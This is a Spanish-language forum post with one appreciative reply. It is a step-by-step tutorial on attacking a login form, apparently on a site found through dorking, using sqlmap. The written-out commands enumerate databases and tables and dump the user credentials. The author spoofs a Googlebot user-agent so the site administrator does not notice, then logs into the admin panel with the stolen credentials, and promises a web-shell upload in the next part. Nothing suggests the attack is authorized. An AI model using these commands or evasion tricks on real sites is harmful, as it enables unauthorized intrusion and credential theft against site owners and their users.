Realizando un ataque de SQLi desde 0 con SQLMap

Iniciado por m0rf30, Julio 15, 2016, 10:39:18 PM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

Julio 15, 2016, 10:39:18 PM Ultima modificación: Julio 18, 2016, 10:25:28 AM por EPSILON
Hola Hackers.

Continuando con nuestro pentest anterior resumimos lo siguiente:


  1.- Aprendimos un poco sobre Dorks.
  2.- Como podríamos pensar como Hackers.
  3.- Formular nuestros Dork's.
  4.- Encontrar nuestra pagina vulnerable.


Muy bien ya aclarado eso vamos a lo siguiente. Creo que si esta leyendo esto es porque estas interesado en el tema, así que si por alguna razón te trabas o no entiendes algo lo buscaras por tu cuenta (ya sabes como buscar  :) ) entonces no entrare en el dilema de toda la vida.


"Debes saber como funcionan las cosas"


Si, eso esta mas que claro, porque existen personas que creen que no se deberían de usar las herramientas hasta que se aprende a hacer las cosas de forma manual pero quien soy yo para decirles que hacer y que no hacer  ::) el punto es que comenzaremos a utilizar la herramienta SQLMAP y algunos de sus comandos u opciones de uso

Yo trabajare en el sistema Kali Linux 2.0 el cual es un sistema operativo basado en Debian. Si usan Wind0$ les dejo un link de como instalar SQLMAP.

Vamos pues.



Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.


Existen dos formas de hacer una SQLi método POST en SQLMAP.
Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.

La primera tendría una forma más o menos así:

Código: text
sqlmap -u "http://www.sitiovulnerable.com/login.asp" –method=POST –data="usr=&pass=" -p usr –dbs


pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar ).

pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar  ).

Código: text
sqlmap -u http://www.sitiovulnerable.com/login.asp –forms –dbs


Es mejor no??
Nosotros usaremos la segunda

Código: text
sqlmap -u http://www.paginavulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 –dbs


ahahaha D:

Pero si dijimos que usaríamos la segunda no ??

un así estamos usando la segunda pero con un poco mas de precaución veamos uno por uno los comando.

    -u = indica la URL o dirección web
    –forms = le indica a SQLMAP que busque los formularios de dicha dirección y extraiga lo que pasarían a ser los datos o consultas que enviaremos en método POST.
    –dbms = El tipo de sistema que administra la base de datos en este caso MicrosoftSqlServer recuerdan??



Atención aquí a esto me refería con precaución.

    –user-agent = sencillo, al usar SQLMAP para nuestras pruebas los servidores guardan en sus logs todo lo que sucede desde una visita y si claro hasta las consultas de SQLMAP. La misma web de sqlmap nos lo dice



así que para no levantar tantas sospechas a un admin bien listo, pues haremos que nuestro Amigo Google nos ayude (

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), lo que hacemos es utilizar a Google, nos disfrazamos como si fuésemos el mismo haciendo peticiones a la pagina atacada.

–level = El numero de pruebas que realizara Sqlmap.
–risk = El riesgo de pruebas que realizara Sqlmap.
–dbs = Que obtenga las Bases de datos


Ven lo que les dije primero busca formularios, después encuentra el primero y por ultimo nos pregunta como lo queremos hacer y que queremos hacer con ese formulario.

Veamos que resultados nos dio >:)

Vaya tiene 30 bases de datos podríamos probar una por una hasta encontrar el usuario y contraseña o mejor aun hacer un –dump-all :D...

Pero seria muy tardado mejor intentemos con este comando.

–current-db
Lo que hará este comando será darnos el nombre de la base de datos sobre la cual esta trabajando la inyección.



Ya esta bueno pues ahora saquemos el usuario y la contraseña.

Código: text
sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 -D baseDeDatos -T Usuario –columns





Muy bien ahora vaciemos los datos.

Código: text
sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL
–user-agent="Mozilla 5 (compatible , Googlebot/2.1,
http://www.google.com/bot.html)"  –level=5 –risk=3 -D baseDeDatos -T
Usuario –columns –dump





Ok ya tenemos las credenciales de inicio  ;)ya tenemos casi todo jajaja.

Regresemos al panel de admin y ingresemos los datos.




:O entramos !!!
Bueno eso es todo en esta parte hacker's pero nos leemos la próxima donde enfrentaremos algo mas que SQLi, ya que lo siguiente es subir una shell a la web para poder hacer más cosas.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos Hacker's.

Muy buenos papers! Dudo que en este foro tengamos hackers.. somos todos aprendices!
Cuando leí el titulo SQLi desde cero, pensé que sería inyectando manualmente y no usando herramientas que hacen todo por ti. De igual forma esta todo muy bien explicado!

Muchas gracias por tu aporte!! Espero la siguiente parte!

Saludos,
ANTRAX